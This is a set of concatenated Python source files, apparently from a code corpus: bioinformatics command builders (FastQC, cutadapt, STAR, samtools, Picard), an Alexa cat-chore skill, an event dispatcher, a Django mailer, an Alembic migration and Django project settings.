3) path - Path to FastQC; Default = 'fastqc'.
'''
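    # Illustrative result, assuming path='fastqc': fastQC('sampleA.R1.fastq.gz', 'out/', 'fastqc')
    # returns "fastqc --extract -q -o out/ sampleA.R1.fastq.gz &&
    # rm out/sampleA.R1_fastqc.html out/sampleA.R1_fastqc.zip".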
# Extract sample name
name = re.search('([^/]+)\\.fastq(?:\\.gz){0,1}$',inFile).group(1)
# Create FastQC command and return it
fastqcCommand = '%s --extract -q -o %s %s && rm %s %s' %(
path,
outDir,
inFile,
os.path.join(outDir, name + '_fastqc.html'),
os.path.join(outDir, name + '_fastqc.zip')
)
# Execute or return command
return(fastqcCommand)
def cutadapt(
read1In, read1Out, read2In, read2Out, quality, adapter, length, path,
overlap, error
):
''' A function to create cutadapt command
Args:
read1In (str)- Path to read1 input file.
read1Out (str)- Path to read2 output file.
read2In (str)- Path to read2 input file.
read2Out (str)- Path to read2 output file.
quality (int)- Base quality score to use for trimming.
adapter (str)- Adapter to use for trimming.
length (int)- Minimum length of trimmed reads.
path (str)- Path for cutadapt program.
'''
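    # An illustrative paired-end command (adapter and thresholds are examples only):
    #   cutadapt -a AGATCGGAAGAGC -A AGATCGGAAGAGC -o out.R1.fastq.gz -p out.R2.fastq.gz \
    #     -e 0.1 -q 20 -m 25 -O 3 in.R1.fastq.gz in.R2.fastq.gz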
# Check arguments
if not read2In is None and read2Out is None:
raise IOError('Output file must be supplied for 2nd read')
if not isinstance(length, int):
raise TypeError('length must be integer')
if length < 25:
raise ValueError('length must be >=25')
if not isinstance(overlap, int):
raise TypeError('overlap must be integer')
if not 1 <= overlap <= len(adapter):
raise ValueError('overlap must be >=1 and <= adapter length')
if not isinstance(error, (int, float)):
raise TypeError('error must be integer or float')
if not 0 <= error < 1:
raise ValueError('error must be >=0 and <1')
# Create single end argument
adapterList = adapter.split(',')
command = [path]
if read2In is None:
for a in adapterList:
command.extend(['-a', a])
command.extend([
'-o', read1Out, '-e', error, '-q', quality, '-m', length, '-O',
overlap, read1In])
else:
for a in adapterList:
command.extend(['-a', a, '-A', a])
command.extend([
'-o', read1Out, '-p', read2Out, '-e', error, '-q', quality, '-m',
length, '-O', overlap, read1In, read2In])
# Join and return command
command = ' '.join(map(str, command))
return command
def starAlign(
indexDir, outPrefix, read1, read2, threads, path, rg=1,
    pl='unknown', lb='unknown', sm='unknown'
):
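    # An illustrative paired-end, gzipped command built below (values are examples only):
    #   STAR --runThreadN 8 --genomeDir /path/to/index --outFileNamePrefix sample. \
    #     --outSAMtype BAM Unsorted --outSAMunmapped Within \
    #     --readFilesIn R1.fastq.gz R2.fastq.gz --readFilesCommand zcat \
    #     --outSAMattrRGline ID:1 PL:unknown LB:unknown SM:unknown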
# Create output command
command = [path, '--runThreadN', threads, '--genomeDir', indexDir,
'--outFileNamePrefix', outPrefix, '--outSAMtype', 'BAM', 'Unsorted',
'--outSAMunmapped', 'Within', '--readFilesIn', read1]
if read2:
command.append(read2)
# Append read file command
if read1.endswith('.gz'):
if read2.endswith('.gz'):
command.extend(['--readFilesCommand', 'zcat'])
else:
raise ValueError('mixture of compressed and uncompressed files')
# Add read group information
if rg:
command.extend(['--outSAMattrRGline', 'ID:{}'.format(rg)])
if pl:
command.append('PL:{}'.format(pl))
if lb:
command.append('LB:{}'.format(lb))
if sm:
command.append('SM:{}'.format(sm))
# Concatenate commadn and return
command = ' '.join(map(str, command))
return(command)
def bamsort(
inFile, outFile, threads, memory, path
):
    ''' Function to create a BAM sort command using samtools.
Args:
inFile (str)- Path to input file.
outFile (str)- Path to outfile.
threads (int)- Number of threads to use in sort.
memory (int)- Memory, in gigabytes, to use in each thread.
path (str)- Path to samtools executable.
Returns:
sortCommand (str)- Output command
'''
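    # An illustrative assembled command (file names are examples only):
    #   samtools sort -m 4G -@ 4 -o out.bam -T out -O BAM in.bam \
    #     && samtools index out.bam && rm in.bam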
# Check input file
if not inFile.endswith('.bam'):
raise TypeError('Input file suffix must be .bam')
# Check output file
if not outFile.endswith('.bam'):
raise TypeError('Output file suffix must be .bam')
# Process memory argument
memory = str(memory) + 'G'
# Generate sort command
sortCommand = [path, 'sort', '-m', memory, '-@', str(threads),
'-o', outFile, '-T', outFile[:-4], '-O', 'BAM', inFile]
sortCommand = filter(None, sortCommand)
sortCommand = ' '.join(sortCommand)
# Delete input and index output
sortCommand += ' && {} index {}'.format(path, outFile)
sortCommand += ' && rm {}'.format(inFile)
# Return command
return(sortCommand)
def markDuplicates(
inBam, outBam, logFile, picardPath, memory
):
''' Function to mark duplicates using the picard toolkit.
Args:
inBam (str)- Full path to input BAM file.
outBam (str)- Full path to output BAM file.
logFile (str)- Full path to output log file.
picardPath (str)- Path to picard jar file.
memory (int)- Amount of memory in java heap in gigabytes.
Returns:
command (str)- Mark duplicates command
'''
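    # An illustrative assembled command (memory and file names are examples only):
    #   java -jar -Xmx4g picard.jar MarkDuplicates I=in.bam O=mdup.bam M=mdup.metrics \
    #     ASSUME_SORTED=true CREATE_INDEX=true REMOVE_DUPLICATES=false && rm in.ba*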
# Create command
command = [
'java', '-jar', '-Xmx{}g'.format(memory), picardPath, 'MarkDuplicates',
'I=' + inBam, 'O=' + outBam, 'M=' + logFile, 'ASSUME_SORTED=true',
'CREATE_INDEX=true', 'REMOVE_DUPLICATES=false'
]
# Merge command, add deletion and return
command = ' '.join(command)
command += ' && rm {}*'.format(inBam[:-1])
return(command)
def rnaseqMetric(
bam, output, refflat, strand, rrna, path, memory
):
''' Function to generate command for picard CollectRNASeqMetrics
Args:
bam (str)- Path to input BAM file.
output (str)- Path to output file.
refflat (str)- Path to reflat file.
        strand (str)- Strand: should be one of none|forward|reverse.
Returns:
command (str)- CollectRnaSeqMetrics command.
'''
# Check strand argument
if strand == 'none':
strandArg = 'STRAND=NONE'
elif strand == 'forward':
strandArg = 'STRAND=FIRST_READ_TRANSCRIPTION_STRAND'
elif strand == 'reverse':
strandArg = 'STRAND=SECOND_READ_TRANSCRIPTION_STRAND'
else:
        raise ValueError('strand must be one of none|forward|reverse')
# Build command
command = [
'java', '-jar', '-Xmx{}g'.format(memory), path, 'CollectRnaSeqMetrics',
'I=' + bam, 'O=' + output, 'REF_FLAT=' + refflat, strandArg,
'RIBOSOMAL_INTERVALS=' + rrna
]
# Join and return command
command = ' '.join(command)
return(command)
def alignMetrics(
bam, output, fasta, path, memory
):
    ''' Function to generate command for picard CollectAlignmentSummaryMetrics
Args:
bam (str)- Path to input BAM file.
output (str)- Path to output file.
fasta (str)- Path to FASTA file.
path (str)- Path to picard executable file.
memory (int)- Initial heap size in gigabytes.
Returns:
command (str)- CollectAlignmentSummaryMetrics command.
'''
# Create command
command = [
'java', '-jar', '-Xmx{}g'.format(memory), path,
'CollectAlignmentSummaryMetrics', 'R=' + fasta, 'I=' + bam,
'O=' + output
]
# Join and return command
command = ' '.join(command)
return(command)
def htseq(
bam, gtf, path, feature='exon', attrid='gene_id', mode='union',
stranded='reverse', mapq=10
):
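    # An illustrative command with the defaults, assuming the configured path points
    # at the htseq-count executable:
    #   htseq-count -f bam -r pos -s reverse -t exon -i gene_id -m union -a 10 \
    #     sample.bam annotation.gtf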
# Check arguments
if not mode in ('union', 'intersection-strict', 'intersection-nonempty'):
raise ValueError('unrecognised mode')
if not stranded in ('yes', 'no', 'reverse'):
raise ValueError('unrecognised stranded argument')
if not isinstance(mapq, int):
raise TypeError('mapq not an integer')
if mapq < 0:
raise ValueError('mapq is negative')
# Create command
command = [path, '-f', 'bam', '-r', 'pos', '-s', stranded, '-t', feature,
'-i', attrid, '-m', mode, '-a', mapq, bam, gtf]
# Join and return command
command = ' '.join(map(str, command))
return(command)
| gpl-2.0 | -6,755,296,205,247,052,000 | 34.373362 | 79 | 0.596877 | false | 3.905738 | false | false | false |
jeffjet24/CatChores | alexa/lambda/CatChoreSkill.py | 1 | 11110 | from operator import itemgetter
import boto3
import json
from datetime import tzinfo, timedelta, datetime
snsClient = boto3.client('sns')
lambdaClient = boto3.client('lambda')
catEventSNS = "arn:aws:sns:us-east-1:818316582971:CatEvent"
catGetPerformedLambda = "arn:aws:lambda:us-east-1:818316582971:function:CatGetPerformed"
TIMEZONE_DIFFERENCE = timedelta(hours = -6)
# --------------- Helpers that build all of the responses ----------------------
def build_speechlet_response(title, output, reprompt_text, should_end_session):
return {
'outputSpeech': {
'type': 'PlainText',
'text': output
},
'card': {
'type': 'Simple',
'title': "SessionSpeechlet - " + title,
'content': "SessionSpeechlet - " + output
},
'reprompt': {
'outputSpeech': {
'type': 'PlainText',
'text': reprompt_text
}
},
'shouldEndSession': should_end_session
}
def build_response(sessionAttributes, speechlet_response):
return {
'version': '1.0',
'sessionAttributes': sessionAttributes,
'response': speechlet_response
}
def getUser(given):
given = given.lower()
if given == "mac" or given == "mack":
return "Mack"
elif given == "autumn":
return "Autumn"
elif given == "david":
return "David"
elif given == "molly":
return "Molly"
elif given == "ben" or given == "been":
return "Ben"
def getActivity(given, cat):
given = given.lower()
if given == "cleaned":
return "DownstairLitter"
elif given == "vacuumed" or given == "vacuum":
return "Vacuum"
elif given == "emptied" or given == "empty":
return "DownstairLitter"
elif given == "clipped":
if cat == "millies" or cat == "millie" or cat == "milly":
cat = "Millie"
return cat + "Nails"
elif given == "fed":
# Add time (AM/PM) determining logic...
return "FeedAM"
# --------------- Functions that control the skill's behavior ------------------
def get_welcome_response():
card_title = "Welcome"
speech_output = "Welcome to the Cat Chores Alexa Skill!" \
"Please tell me what chore has been just been completed and who has completed it. "\
"Please say it in past tense."\
" You can also ask when a chore has last been done "
reprompt_text = "Please tell me what chore has been just been completed. "\
"Please say it in past tense."
should_end_session = False
return build_response({}, build_speechlet_response(
card_title, speech_output, reprompt_text, should_end_session))
def handle_session_end_request():
card_title = "Session Ended"
speech_output = "Thank you! Have a nice day!"
should_end_session = True
return build_response({}, build_speechlet_response(
card_title, speech_output, None, should_end_session))
def performChore(intent, session, event):
card_title = intent['name']
should_end_session = True
eventName = ""
actorName = getUser(event["request"]["intent"]["slots"]["User"]["value"])
if "value" in event["request"]["intent"]["slots"]["Cat"]:
catName = event["request"]["intent"]["slots"]["Cat"]["value"]
eventName = getActivity(event["request"]["intent"]["slots"]["Chore"]["value"], catName)
else:
eventName = getActivity(event["request"]["intent"]["slots"]["Chore"]["value"], "")
utc_dt = datetime.strptime(event["request"]["timestamp"], '%Y-%m-%dT%H:%M:%SZ') + TIMEZONE_DIFFERENCE
time = int((utc_dt - datetime(1970, 1, 1)).total_seconds())
if eventName == "FeedAM" and utc_dt.hour >= 12:
eventName = "FeedPM"
print("Completed Event: " + eventName)
post_message = {'name': actorName, "time": str(time), "event": eventName}
response = snsClient.publish(
TopicArn = catEventSNS,
Message = json.dumps({"name": actorName, "time": time, "event": eventName}))
print("Response: " + json.dumps(response, indent=2))
speech_output = "Thank You! That record has been added!"
return build_response({}, build_speechlet_response(
card_title, speech_output, "", should_end_session))
def getPerformedChore(intent, session, event):
card_title = intent['name']
latestChores = lambdaClient.invoke(
FunctionName = catGetPerformedLambda,
InvocationType = 'RequestResponse'
)
payload = latestChores['Payload'].read()
choresList = json.loads(json.loads(json.loads(payload)['body'])['Message'])
eventName = ""
if "value" in event["request"]["intent"]["slots"]["Cat"]:
catName = event["request"]["intent"]["slots"]["Cat"]["value"]
eventName = getActivity(event["request"]["intent"]["slots"]["Chore"]["value"], catName)
else:
eventName = getActivity(event["request"]["intent"]["slots"]["Chore"]["value"], "")
selecteditem = {}
if eventName != "FeedAM" and eventName != "FeedPM":
for task in choresList:
taskItem = task['item']
if taskItem['task'] == eventName:
selecteditem = task
break
else:
feedAMTask = {}
feedPMTask = {}
for task in choresList:
taskItem = task['item']
if taskItem['task'] == "FeedAM":
feedAMTask = task
elif taskItem['task'] == "FeedPM":
feedPMTask = task
if feedAMTask and feedPMTask:
break
if int(feedAMTask['item']['time']) < int(feedPMTask['item']['time']):
selecteditem = feedPMTask
else:
selecteditem = feedAMTask
if selecteditem:
lastTimeStamp = selecteditem['item']['time']
lastPerson = selecteditem['item']['personName']
lastStatus = selecteditem['status']
lastChore = selecteditem['item']['task']
lastDateTime = datetime.fromtimestamp(int(lastTimeStamp)) + TIMEZONE_DIFFERENCE
lastTime = lastDateTime.strftime("%I:%M%p")
lastDay = '{0:%A}, {0:%B} {0:%d}'.format(lastDateTime)
speech_output = ""
if lastChore == "FeedAM" or lastChore == "FeedPM":
speech_output = speech_output + "The cat was last fed by "
elif lastChore == "DownstairLitter":
speech_output = speech_output + "The downstairs litter was last emptied by "
elif lastChore == "UpstairLitter":
speech_output = speech_output + "The upstairs litter was last emptied by "
elif lastChore == "Vacuum":
speech_output = speech_output + "The carpet was last vacuumed by "
elif lastChore == "MillieNails":
speech_output = speech_output + "Millie's nails were last clipped by "
elif lastChore == "KittyXNails":
speech_output = speech_output + "Kitty X's nails were last clipped by "
speech_output = speech_output + str(lastPerson) + " at "+ str(lastTime) + " on " + str(lastDay) + ". "
if lastStatus == "green":
speech_output = speech_output + "The chore has been done recently, and does not need to be done at this time."
elif lastStatus == "yellow":
speech_output = speech_output + "The chore should be done soon, however can go a little bit longer before needing to be done."
else:
speech_output = speech_output + "The chore needs to be done. Please do the chore as soon as possible."
print("Speech Output: " + speech_output)
return build_response({}, build_speechlet_response(
card_title, speech_output, "", True))
else:
speech_output = "Please make your request again, I did not understand your query. "
return build_response({}, build_speechlet_response(
card_title, speech_output, "Please ask me when a chore was done last or tell me that a chore has been completed. ", False))
# --------------- Events ------------------
def on_session_started(session_started_request, session):
""" Called when the session starts """
print("on_session_started requestId=" + session_started_request['requestId']
+ ", sessionId=" + session['sessionId'])
def on_launch(launch_request, session):
""" Called when the user launches the skill without specifying what they
want
"""
print("on_launch requestId=" + launch_request['requestId'] +
", sessionId=" + session['sessionId'])
# Dispatch to your skill's launch
return get_welcome_response()
def on_intent(intent_request, session, event):
""" Called when the user specifies an intent for this skill """
print("on_intent requestId=" + intent_request['requestId'] +
", sessionId=" + session['sessionId'])
intent = intent_request['intent']
intent_name = intent_request['intent']['name']
# Dispatch to your skill's intent handlers
if intent_name == "PerformChore":
return performChore(intent, session, event)
elif intent_name == "GetChore":
return getPerformedChore(intent, session, event)
elif intent_name == "AMAZON.HelpIntent":
return get_welcome_response()
elif intent_name == "AMAZON.CancelIntent" or intent_name == "AMAZON.StopIntent":
return handle_session_end_request()
else:
raise ValueError("Invalid intent")
def on_session_ended(session_ended_request, session):
""" Called when the user ends the session.
Is not called when the skill returns should_end_session=true
"""
print("on_session_ended requestId=" + session_ended_request['requestId'] +
", sessionId=" + session['sessionId'])
# add cleanup logic here
# --------------- Main handler ------------------
def lambda_handler(event, context):
""" Route the incoming request based on type (LaunchRequest, IntentRequest,
etc.) The JSON body of the request is provided in the event parameter.
"""
print("event.session.application.applicationId=" +
event['session']['application']['applicationId'])
print("Received event: " + json.dumps(event, indent=2))
"""
    Uncomment this if statement and populate with your skill's application ID to
prevent someone else from configuring a skill that sends requests to this
function.
"""
# if (event['session']['application']['applicationId'] !=
# "amzn1.echo-sdk-ams.app.[unique-value-here]"):
# raise ValueError("Invalid Application ID")
if event['session']['new']:
on_session_started({'requestId': event['request']['requestId']},
event['session'])
if event['request']['type'] == "LaunchRequest":
return on_launch(event['request'], event['session'])
elif event['request']['type'] == "IntentRequest":
return on_intent(event['request'], event['session'], event)
elif event['request']['type'] == "SessionEndedRequest":
return on_session_ended(event['request'], event['session'])
| gpl-3.0 | 1,798,919,851,824,090,600 | 37.047945 | 138 | 0.607381 | false | 3.885974 | false | false | false |
argolab/herzog | base/event.py | 1 | 1217 | class Precondition(Exception):
def __init__(self, name, **kwargs) :
self.name = name
self.kwargs = kwargs
def __str__(self):
return 'Precondition(%s)' % self.name
class EventServer :
def __init__(self):
self._pool = {}
self._desc = {}
def register(self, event, desc=''):
self._pool[event] = []
self._desc[event] = desc
def bind(self, event, handle=None):
if event not in self._pool :
raise ValueError('No such event name')
# use for decorator
if not handle :
def binder(handle):
self._pool[event].append(handle)
return handle
return binder
self._pool[event].append(handle)
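	# Hedged usage sketch (the names below are hypothetical, not part of this module):
	#   events = EventServer()
	#   events.register('start', 'fired once at startup')
	#   @events.bind('start')
	#   def on_start(**kwargs):
	#       print(kwargs)
	#   events.trigger('start', user='alice')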
def trigger(self, event, **kwargs):
if event not in self._pool :
raise ValueError('No such event name')
for e in self._pool[event] :
e(**kwargs)
def off(self, event, handle) :
for i, h in enumerate(self._pool[event]) :
if h is handle :
del self._pool[event][i]
return
def help(self, event) :
return self._desc[event]
| gpl-2.0 | 236,320,206,687,170,600 | 25.456522 | 50 | 0.509449 | false | 4.255245 | false | false | false |
596acres/django-livinglots-mailings | livinglots_mailings/mailers.py | 1 | 8385 | from datetime import datetime, timedelta
from itertools import groupby
import logging
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from django.contrib.sites.models import Site
from django.core.mail.message import EmailMultiAlternatives
from django.template.loader import render_to_string
from .models import DeliveryRecord
class Mailer(object):
def __init__(self, mailing):
self.mailing = mailing
self.last_checked = self.mailing.last_checked
self.time_started = datetime.now()
self.mailing.last_checked = self.time_started
self.mailing.save()
def get_recipients(self):
"""Get the recipients to which this mailing should be sent."""
return ()
def get_already_received(self, receiver_type=None):
"""
Find entities [of a particular type] that already received the mailing.
"""
drs = DeliveryRecord.objects.filter(
sent=True,
mailing=self.mailing,
)
if receiver_type:
drs = drs.filter(receiver_type=receiver_type)
# XXX this is not very efficient
return [r.receiver_object for r in drs if r.receiver_object is not None]
def get_context(self, recipients):
"""
Get the context to be used when constructing the subject and text of
the mailing.
"""
return {
'mailing': self.mailing,
'recipients': recipients,
}
def build_subject(self, recipients, context):
return render_to_string(self.mailing.subject_template_name, context)
def build_message(self, recipients, context):
return render_to_string(self.mailing.text_template_name, context)
def build_html_message(self, recipients, context):
if self.mailing.html_template_name:
return render_to_string(self.mailing.html_template_name, context)
return None
def build_bcc(self, recipients):
"""Get a list of email addresses to BCC."""
return (settings.FACILITATORS.get('global', []))
def add_delivery_records(self, recipients, sent=True):
"""
Add a DeliveryRecord to each recipient.
"""
drs = []
for recipient in recipients:
dr = DeliveryRecord(
sent=sent,
mailing=self.mailing,
receiver_object=recipient
)
dr.save()
drs.append(dr)
return drs
def mail(self, fake=False):
"""Get intended recipients, prepare the message, send it."""
recipients = self.get_recipients()
# Faking it--just add delivery records for recipients and jump out
if fake:
self.add_delivery_records(recipients)
return recipients
duplicate_handling = self.mailing.duplicate_handling
if duplicate_handling in ('merge', 'send first'):
            # group by email address to handle duplicates; groupby only groups
            # adjacent items, so sort by email first
            for email, recipient_group in groupby(sorted(recipients, key=lambda r: r.email),
                                                  lambda r: r.email):
                recipient_group = list(recipient_group)
                if duplicate_handling == 'send first':
                    recipient_group = [recipient_group[0]]
                self._prepare_and_send_message(recipient_group, email)
else:
# Don't bother grouping--every recipient gets every message
for r in recipients:
self._prepare_and_send_message([r], r.email)
return recipients
def _prepare_and_send_message(self, recipients, email):
"""
Build the subject and text of the message, email it to the given
email address.
"""
context = self.get_context(recipients)
self._send(
self.build_subject(recipients, context),
self.build_message(recipients, context),
email,
bcc=self.build_bcc(recipients),
html_message=self.build_html_message(recipients, context),
)
return self.add_delivery_records(recipients)
def _send(self, subject, message, email_address,
bcc=[settings.FACILITATORS['global']], connection=None,
fail_silently=True, html_message=None):
# Subject cannot contain newlines
subject = subject.replace('\n', '').strip()
logging.debug('sending mail with subject "%s" to %s'
% (subject, email_address))
logging.debug('bcc: %s' % (bcc,))
logging.debug('full text: "%s"' % message)
mail = EmailMultiAlternatives(
u'%s%s' % (settings.EMAIL_SUBJECT_PREFIX, subject),
message,
from_email=settings.DEFAULT_FROM_EMAIL,
to=[email_address],
connection=connection,
bcc=bcc,
)
if html_message:
mail.attach_alternative(html_message, 'text/html')
mail.send(fail_silently=fail_silently)
class DaysAfterAddedMailer(Mailer):
def get_recipient_queryset(self, model):
"""
Check for entities added in the time between the last time the mailing
was sent and now, shifting backward in time for the number of days
after an entity is added that we want to send them the mailing.
"""
delta = timedelta(days=self.mailing.days_after_added)
return model.objects.filter(
added__gt=self.last_checked - delta,
added__lte=self.time_started - delta,
email__isnull=False,
).exclude(email='')
def _get_ctype_recipients(self, ctype):
"""Get entities of type ctype that should receive the mailing."""
type_recipients = self.get_recipient_queryset(ctype.model_class())
# only get already received if there are potential recipients
if not type_recipients:
return []
received = self.get_already_received(receiver_type=ctype)
return list(set(type_recipients) - set(received))
def get_recipients(self):
recipient_lists = [self._get_ctype_recipients(ct) for ct in self.mailing.target_types.all()]
        return reduce(lambda x, y: x + y, recipient_lists, [])
def get_context(self, recipients):
context = super(DaysAfterAddedMailer, self).get_context(recipients)
context['has_received_this_mailing'] = self.has_received(
self.mailing,
recipients[0]
)
return context
def has_received(self, mailing, recipient):
other_pks = recipient.__class__.objects.filter(
email=recipient.email
).exclude(pk=recipient.pk).values_list('pk', flat=True)
records = DeliveryRecord.objects.filter(
mailing=mailing,
receiver_object_id__in=other_pks,
receiver_type=ContentType.objects.get_for_model(recipient)
)
return records.count() > 0
class DaysAfterParticipantAddedMailer(DaysAfterAddedMailer):
"""
DaysAfterAddedMailer customized for participants, such as those added
through livinglots_organize.
"""
def get_context(self, recipients):
context = super(DaysAfterParticipantAddedMailer, self).get_context(recipients)
# Add BASE_URL for full-path links back to the site
context['BASE_URL'] = Site.objects.get_current().domain
# Consolidate participant objects (handy when merging mailings)
context['lots'] = self.get_lots(recipients)
# Url for changing what one's organizing/watching
context['edit_url'] = recipients[0].get_edit_url()
return context
def get_lots(self, recipients):
"""
Get lots the recipients will be receiving email for.
Filter the lots to ensure that a group does not have access to the lot.
Getting email about starting organizing on a lot when there's already a
project there is misleading/confusing.
"""
lots = list(set([r.content_object for r in recipients]))
return filter(lambda lot: not lot.steward_projects.exists(), lots)
def get_recipients(self):
"""
Get recipients for this mailing.
We confirm that the recipient has lots to receive the mailing for,
first.
"""
recipients = super(DaysAfterParticipantAddedMailer, self).get_recipients()
return [r for r in recipients if len(self.get_lots([r,])) > 0]
| agpl-3.0 | -2,082,258,457,765,415,200 | 34.987124 | 100 | 0.623494 | false | 4.333333 | false | false | false |
alphagov/notifications-api | migrations/versions/0095_migrate_existing_svc_perms.py | 1 | 1614 | """empty message
Revision ID: 0095_migrate_existing_svc_perms
Revises: 0094_job_stats_update
Create Date: 2017-05-23 18:13:03.532095
"""
# revision identifiers, used by Alembic.
revision = '0095_migrate_existing_svc_perms'
down_revision = '0094_job_stats_update'
from alembic import op
import sqlalchemy as sa
migration_date = '2017-05-26 17:30:00.000000'
def upgrade():
def get_values(permission):
return "SELECT id, '{0}', '{1}' FROM services WHERE "\
"id NOT IN (SELECT service_id FROM service_permissions "\
"WHERE service_id=id AND permission='{0}')".format(permission, migration_date)
def get_values_if_flag(permission, flag):
return "SELECT id, '{0}', '{1}' FROM services WHERE "\
"{2} AND id NOT IN (SELECT service_id FROM service_permissions "\
"WHERE service_id=id AND permission='{0}')".format(permission, migration_date, flag)
op.execute("INSERT INTO service_permissions (service_id, permission, created_at) {}".format(get_values('sms')))
op.execute("INSERT INTO service_permissions (service_id, permission, created_at) {}".format(get_values('email')))
op.execute("INSERT INTO service_permissions (service_id, permission, created_at) {}".format(
get_values_if_flag('letter', 'can_send_letters')))
op.execute("INSERT INTO service_permissions (service_id, permission, created_at) {}".format(
get_values_if_flag('international_sms', 'can_send_international_sms')))
def downgrade():
op.execute("DELETE FROM service_permissions WHERE created_at = '{}'::timestamp".format(migration_date))
| mit | -231,256,906,441,808,160 | 40.384615 | 117 | 0.685874 | false | 3.635135 | false | false | false |
ntamas/python-selecta | selecta/matches.py | 1 | 2701 | from functools import total_ordering
@total_ordering
class Match(object):
"""Object representing a match in a search index.
Attributes:
matched_object (object): the object that was matched
matched_string (string): the string representation of the object
score (float): the score of the match. Higher scores indicate a better
match.
substrings (list of tuples): optional list of substrings to mark in
the string representation of the object. Each tuple in the list
is a pair of the start and end indices of the substring.
"""
def __init__(self):
self.matched_object = None
self.matched_string = None
self.score = 0.0
self.substrings = []
def __lt__(self, other):
        # Compare by score first and fall back to the matched string, so the
        # ordering stays consistent when scores are tied
        if self.score != other.score:
            return self.score < other.score
        return self.matched_string < other.matched_string
def canonicalize(self):
"""Canonicalizes the match by ensuring that the ranges in the map
do not overlap with each other and are sorted by the start index."""
self.substrings = canonical_ranges(self.substrings)
def canonical_ranges(ranges):
"""Given a list of ranges of the form ``(start, end)``, returns
another list that ensures that:
- For any number *x*, *x* will be included in at most one of the returned
ranges.
- For any number *x*, *x* will be included in one of the returned ranges
if and only if *x* was included in at least one of the input ranges.
- The returned ranges are sorted by the start index.
- There exist no pairs of ranges in the returned list such that the end
of one of the ranges is the start of the other.
Args:
ranges (list of tuples): list of ranges of the form ``(start, end)``
Returns:
list of tuples: the canonical representation of the input list, as
defined by the rules above.
"""
if len(ranges) < 2:
return ranges
result = sorted(ranges)
changed = True
while changed:
if len(result) < 2:
return result
next_result, changed = [], False
prev_start, prev_end = result.pop(0)
for curr in result:
curr_start, curr_end = curr
if prev_end >= curr_start:
# prev and curr have an overlap, so merge them
prev_end = curr_end
changed = True
else:
# No overlap, prev_start and prev_end can be saved
next_result.append((prev_start, prev_end))
prev_start, prev_end = curr
next_result.append((prev_start, prev_end))
result = next_result
return result
| mit | 9,098,674,901,230,635,000 | 32.7625 | 78 | 0.613847 | false | 4.43514 | false | false | false |
romanvm/romans_blog | romans_blog/settings/base.py | 1 | 8236 | # coding: utf-8
"""
Django settings for romans_blog project.
Generated by 'django-admin startproject' using Django 1.8.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
import sys
BASE_DIR = os.path.dirname(
os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
)
sys.path.insert(0, BASE_DIR)
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'fvh+o&w4qo-afc#fu8fy7=1_imte!d7k1d)9q+=603@963+sk!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['127.0.0.1', 'localhost']
SITE_ID = 1
# Application definition
INSTALLED_APPS = [
'filebrowser',
'tinymce',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.sitemaps',
'adminsortable2',
'haystack',
'solo',
'common_content',
'blog',
'pages',
'bootstrap4_skin',
]
MIDDLEWARE = [
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'common_content.middleware.maintenance_mode_middleware',
]
ROOT_URLCONF = 'romans_blog.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'romans_blog.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGES = [
('en-us', 'US English'),
('ru', 'Русский'),
('uk', 'Українська'),
]
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Kiev'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# Media files (user images, videos, other files)
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
FILEBROWSER_ADMIN_THUMBNAIL = 'small'
# TinyMCE settings
common_content_base_url = STATIC_URL + 'common_content/'
TINYMCE_DEFAULT_CONFIG = {
'theme': 'modern',
'plugins': 'advlist autolink link image imagetools lists charmap print hr anchor pagebreak '
'searchreplace wordcount visualblocks visualchars code fullscreen insertdatetime media '
'nonbreaking save table contextmenu directionality emoticons template paste textcolor '
'spellchecker autosave noneditable',
'toolbar1': 'django_saveandcontinue | undo redo | cut copy paste | searchreplace | styleselect removeformat | '
'fontsizeselect | forecolor backcolor | code preview | spellchecker | fullscreen',
'toolbar2': 'bold italic underline strikethrough | alignleft aligncenter alignright alignjustify '
'| bullist numlist outdent indent | blockquote hr charmap nonbreaking '
'| link anchor | image media emoticons | table | codesample | spoiler-add spoiler-remove',
'contextmenu': 'formats | cut copy paste | link image | inserttable row cell',
'style_formats': [
{'title': 'Special', 'items': [
{'title': 'Small text', 'inline': 'small'},
{'title': 'Keyboard input', 'inline': 'kbd'},
{'title': 'Sample output', 'inline': 'samp'},
]},
{'title': 'Image', 'items': [
{'title': 'Image Left', 'selector': 'img', 'styles': {'float': 'left', 'margin': '10px'}},
{'title': 'Image Right', 'selector': 'img', 'styles': {'float': 'right', 'margin': '10px'}}
]},
],
'style_formats_merge': True,
'width': 1024,
'height': 600,
'spellchecker_languages': 'English (US)=en_US,Russian=ru,Ukrainian=uk',
